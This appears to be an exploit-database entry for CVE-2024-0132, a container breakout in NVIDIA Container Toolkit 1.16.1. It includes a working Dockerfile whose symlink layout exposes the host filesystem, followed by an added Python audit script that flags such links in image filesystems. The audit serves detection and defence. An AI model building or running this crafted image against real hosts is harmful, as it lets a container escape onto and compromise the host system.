# Exploit Title: Container Breakout with NVIDIA Container Toolkit
# Date: 17/02/2025
# Exploit Author: r0binak
# Software Link Homepage: https://github.com/NVIDIA/nvidia-container-toolkit
# Version: 1.16.1
# Tested on: NVIDIA Container Toolkit 1.16.1
# CVE: CVE-2024-0132

Description:
NVIDIA Container Toolkit 1.16.1 or earlier contains a Time-of-check Time-of-Use (TOCTOU) vulnerability when used with default configuration where a specifically crafted container image may gain access to the host file system. This does not impact use cases where CDI is used. A successful exploit of this vulnerability may lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.

PoC link: https://github.com/r0binak/CVE-2024-0132

Steps to Reproduce:
Build and run a Docker image from the following Dockerfile:

FROM ubuntu
RUN mkdir -p /usr/local/cuda/compat/
RUN mkdir -p /usr/lib/x86_64-linux-gnu/libdxcore.so.1337/
RUN echo test > /usr/lib/x86_64-linux-gnu/libdxcore.so.1337/libdxcore.so.1337.hostfs
RUN mkdir -p /pwn/libdxcore.so.1337/
RUN ln -s ../../../../../../../../../ /pwn/libdxcore.so.1337/libdxcore.so.1337.hostfs
RUN ln -s /pwn/libdxcore.so.1337 /usr/local/cuda/compat/libxxx.so.1
RUN ln -s /usr/lib/x86_64-linux-gnu/libdxcore.so.1337/libdxcore.so.1337.hostfs /usr/local/cuda/compat/libxxx.so.2

The host file system will reside in /usr/lib/x86_64-linux-gnu/libdxcore.so.1337.hostfs/

Regards,
Sergey `*r0binak*` Kanibor
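
Added example, not part of the original PoC or of NVIDIA's code: a Python audit that walks an image root filesystem already unpacked into a directory and flags the symlink layout the Dockerfile above creates. The function names, the reason labels and the rule that entries in /usr/local/cuda/compat should only link to siblings in that directory are assumptions made for illustration.

```python
import os
import tempfile

COMPAT = "usr/local/cuda/compat"  # directory the page's Dockerfile fills with links

def climbs_above_root(link_rel, target):
    """True if the target has more '..' steps than its starting depth in the image."""
    parent = link_rel.rpartition("/")[0]
    depth = 0 if target.startswith("/") or not parent else len(parent.split("/"))
    for part in target.split("/"):
        if part in ("", "."):
            continue
        depth += -1 if part == ".." else 1
        if depth < 0:
            return True
    return False

def audit_rootfs(rootfs):
    """Return sorted (reason, path, target) findings for symlinks under rootfs."""
    findings = []
    for dirpath, dirs, files in os.walk(rootfs, followlinks=False):
        for name in dirs + files:
            full = os.path.join(dirpath, name)
            if not os.path.islink(full):
                continue
            rel = os.path.relpath(full, rootfs).replace(os.sep, "/")
            target = os.readlink(full)
            if climbs_above_root(rel, target):
                findings.append(("escapes-root", rel, target))
            # Assumed rule: compat entries may only link to siblings in that directory.
            if rel.rpartition("/")[0] == COMPAT and "/" in target:
                findings.append(("compat-link-leaves-dir", rel, target))
    return sorted(findings)

def audit_sample():
    """Constructed sample: rebuild the Dockerfile's links in a temp dir and audit it."""
    lib = "/usr/lib/x86_64-linux-gnu/libdxcore.so.1337"
    links = {"pwn/libdxcore.so.1337/libdxcore.so.1337.hostfs": "../" * 9,
             COMPAT + "/libxxx.so.1": "/pwn/libdxcore.so.1337",
             COMPAT + "/libxxx.so.2": lib + "/libdxcore.so.1337.hostfs",
             COMPAT + "/libok.so.1": "libok.so.1.0"}  # constructed benign sibling link
    with tempfile.TemporaryDirectory() as root:
        for path, target in links.items():
            full = os.path.join(root, path)
            os.makedirs(os.path.dirname(full), exist_ok=True)
            os.symlink(target, full)
        return audit_rootfs(root)

if __name__ == "__main__":
    print(*audit_sample(), sep="\n")
```

The depth count is lexical and does not resolve intermediate symlinks, so findings are leads for manual review of an image rather than a verdict.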